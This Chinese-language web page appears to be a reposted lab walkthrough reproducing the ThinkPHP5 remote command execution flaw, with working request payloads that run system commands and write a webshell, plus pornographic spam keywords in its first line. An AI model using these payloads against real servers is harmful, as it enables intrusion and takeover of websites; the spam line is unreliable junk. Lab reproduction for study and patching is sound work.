国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

ThinkPHP5遠(yuǎn)程命令執(zhí)行漏洞

這篇具有很好參考價(jià)值的文章主要介紹了ThinkPHP5遠(yuǎn)程命令執(zhí)行漏洞。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

ThinPHP簡介

ThinkPHP是一個(gè)快速、兼容而且簡單的輕量級(jí)國產(chǎn) PHP開發(fā)框架?,誕生于2006年初,原名FCS,2007年元旦正式更名為ThinkPHP,遵循Apache2開源協(xié)議發(fā)布,使用面向?qū)ο蟮拈_發(fā)結(jié)構(gòu)和 MVC模式 ,從Struts結(jié)構(gòu)移植過來并做了改進(jìn)和完善,同時(shí)也借鑒了國外很多優(yōu)秀的框架和模式。

漏洞產(chǎn)生原因

由于thinkPHP5框架對(duì)控制器名沒有進(jìn)行足夠的安全檢測,導(dǎo)致在沒有開啟強(qiáng)制路由的情況下,攻擊者構(gòu)造指定的請(qǐng)求,可以直接getshell。

受影響版本

thinkPHP 5.0.x <thinkPHP 5.0.23

thinkPHP 5.1 <thinkPHP 5.1.31

漏洞復(fù)現(xiàn)

啟動(dòng)環(huán)境

docker-compose build
docker-compose up -d

訪問web環(huán)境

ThinkPHP5遠(yuǎn)程命令執(zhí)行漏洞

?代碼執(zhí)行

/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

ThinkPHP5遠(yuǎn)程命令執(zhí)行漏洞

?

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd

ThinkPHP5遠(yuǎn)程命令執(zhí)行漏洞

?寫入一句話

?

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要寫入的文件內(nèi)容url編碼

ThinkPHP5遠(yuǎn)程命令執(zhí)行漏洞

蟻劍連接

ThinkPHP5遠(yuǎn)程命令執(zhí)行漏洞

修復(fù)建議:請(qǐng)升級(jí)至最新版本

?參考鏈接:ThinkPHP5 遠(yuǎn)程命令執(zhí)行漏洞 - ??無恙 - 博客園文章來源地址http://www.zghlxwxcb.cn/news/detail-506430.html

到了這里,關(guān)于ThinkPHP5遠(yuǎn)程命令執(zhí)行漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)

    ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)

    目錄 漏洞介紹 漏洞復(fù)現(xiàn) 1.環(huán)境搭建 2.漏洞利用 5.0.23以前的版本中,獲取method的方法中沒有正確處理方法名,導(dǎo)致攻擊者可以調(diào)用Request類任意方法并構(gòu)造利用鏈,從而導(dǎo)致遠(yuǎn)程代碼執(zhí)行漏洞。 1.環(huán)境搭建 使用docker容器搭建漏洞環(huán)境,進(jìn)入漏洞文件所在。 cd vulhub/thinkphp/5.0.2

    2024年02月06日
    瀏覽(22)
  • Thinkphp5.x全漏洞復(fù)現(xiàn)分析

    Thinkphp5.x全漏洞復(fù)現(xiàn)分析

    我們可以把namespace理解為一個(gè)單獨(dú)的空間,事實(shí)上它也就是一個(gè)空間而已,子命名空間那就是空間里再劃分幾個(gè)小空間,舉個(gè)例子: 當(dāng)有多個(gè)子命名空間有相同名稱類時(shí),不指定使用哪個(gè)命名空間的情況下取最后定義的命名空間中的類,比如上面的 dog 取的時(shí) dogC 中的類,在

    2024年04月22日
    瀏覽(25)
  • thinkphp5.0.24反序列化漏洞分析

    thinkphp5.0.24反序列化漏洞分析

    thinkphp5框架: thinkphp5的入口文件在 publicindex.php ,訪問 反序列化起點(diǎn) 寫一個(gè)反序列化入口點(diǎn) 全局搜索 __destruct() 函數(shù) thinkphp_5.0.24thinkphplibrarythinkprocesspipesWindows.php 中的 __destruct() 函數(shù),調(diào)用了removeFiles() 跟進(jìn)removeFiles(),第163行的file_exists可以觸發(fā) __toString 方法 全局搜索

    2023年04月08日
    瀏覽(32)
  • ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路

    ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路

    前言 本節(jié)我將分析thinkphp5.0.x 版本的RCE漏洞,根據(jù)漏洞的研究模擬挖掘此漏洞的思路 本次分析框架下載,由于官方已經(jīng)下架了相關(guān)的下載接口,這里我們用三方下載 一份v5.0.22版本的 升級(jí)中... https://www.codejie.net/5828.html 附贈(zèng)?thinkphp5.0官方開發(fā)手冊(cè) 架構(gòu)總覽 · ThinkPHP5.0完全開

    2024年01月18日
    瀏覽(30)
  • nginxWebUI 遠(yuǎn)程命令執(zhí)行漏洞

    nginxWebUI 遠(yuǎn)程命令執(zhí)行漏洞

    nginxWebUI是一款圖形化管理nginx配置的工具,能通過網(wǎng)頁快速配置nginx的各種功能,包括HTTP和TCP協(xié)議轉(zhuǎn)發(fā)、反向代理、負(fù)載均衡、靜態(tài)HTML服務(wù)器以及SSL證書的自動(dòng)申請(qǐng)、續(xù)簽和配置,配置完成后可以一鍵生成nginx.conf文件,并控制nginx使用此文件進(jìn)行啟動(dòng)和重載。nginxWebUI后臺(tái)提

    2024年02月11日
    瀏覽(21)
  • RCE(遠(yuǎn)程命令執(zhí)行)漏洞詳解

    RCE(remote command/code execute,遠(yuǎn)程命令執(zhí)行)漏洞 遠(yuǎn)程代碼執(zhí)行 (RCE) 攻擊是指攻擊者可以在一個(gè)組織的計(jì)算機(jī)或網(wǎng)絡(luò)上運(yùn)行惡意代碼。執(zhí)行攻擊者控制的代碼的能力可用于各種目的,包括部署額外的惡意軟件或竊取敏感數(shù)據(jù)。 遠(yuǎn)程代碼執(zhí)行攻擊通常通過網(wǎng)絡(luò)應(yīng)用程序和網(wǎng)絡(luò)基礎(chǔ)

    2024年04月10日
    瀏覽(31)
  • 【漏洞復(fù)現(xiàn)】銳捷 EWEB auth 遠(yuǎn)程命令執(zhí)行漏洞

    【漏洞復(fù)現(xiàn)】銳捷 EWEB auth 遠(yuǎn)程命令執(zhí)行漏洞

    免責(zé)聲明:文章來源互聯(lián)網(wǎng)收集整理,請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所產(chǎn)生的一切不良后果與文章作者無關(guān)。該文章僅供學(xué)習(xí)用途使用。 ?? ? ? ? ? ?

    2024年03月12日
    瀏覽(17)
  • RCE遠(yuǎn)程命令執(zhí)行漏洞挖掘思路

    RCE遠(yuǎn)程命令執(zhí)行漏洞挖掘思路

    1.URL上 在 url參數(shù)上 ,不僅僅可能存在ssrf漏洞,也有很大概率存在命令執(zhí)行,很大可能調(diào)用系統(tǒng)命令如curl。 payload例子: index.php?id=2;}phpinfo();/* ttp://www.xxx.com/cmd.php?cmd=phpinfo() 比如訪問到如下URL,在jsp后面嘗試加參數(shù),比如path(什么參數(shù)需要試) ? ? http://x.x.x.x:28076/file/dirF

    2024年02月01日
    瀏覽(22)
  • 漏洞復(fù)現(xiàn) - - -Struts2(s2-045)遠(yuǎn)程命令執(zhí)行漏洞

    漏洞復(fù)現(xiàn) - - -Struts2(s2-045)遠(yuǎn)程命令執(zhí)行漏洞

    Struts2是一個(gè)基于MVC設(shè)計(jì)模式的Web應(yīng)用框架,它本質(zhì)上相當(dāng)于一個(gè)servlet,在MVC設(shè)計(jì)模式中,Struts2作為控制器(Controller)來建立模型與視圖的數(shù)據(jù)交互。Struts 2是Struts的下一代產(chǎn)品,是在 struts 1和WebWork的技術(shù)基礎(chǔ)上進(jìn)行了合并的全新的Struts 2框架。其全新的Struts 2的體系結(jié)構(gòu)與St

    2024年01月20日
    瀏覽(31)
  • 藍(lán)凌OA 漏洞學(xué)習(xí)——treexml.tmpl 遠(yuǎn)程命令執(zhí)行漏洞

    注:該文章來自作者日常學(xué)習(xí)筆記,請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試,如因此產(chǎn)生的一切不良后果與作者無關(guān)。 目錄 一、漏洞概述?? 二、影響版本 三、資產(chǎn)測繪?? 四、漏洞復(fù)現(xiàn)

    2024年02月13日
    瀏覽(19)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包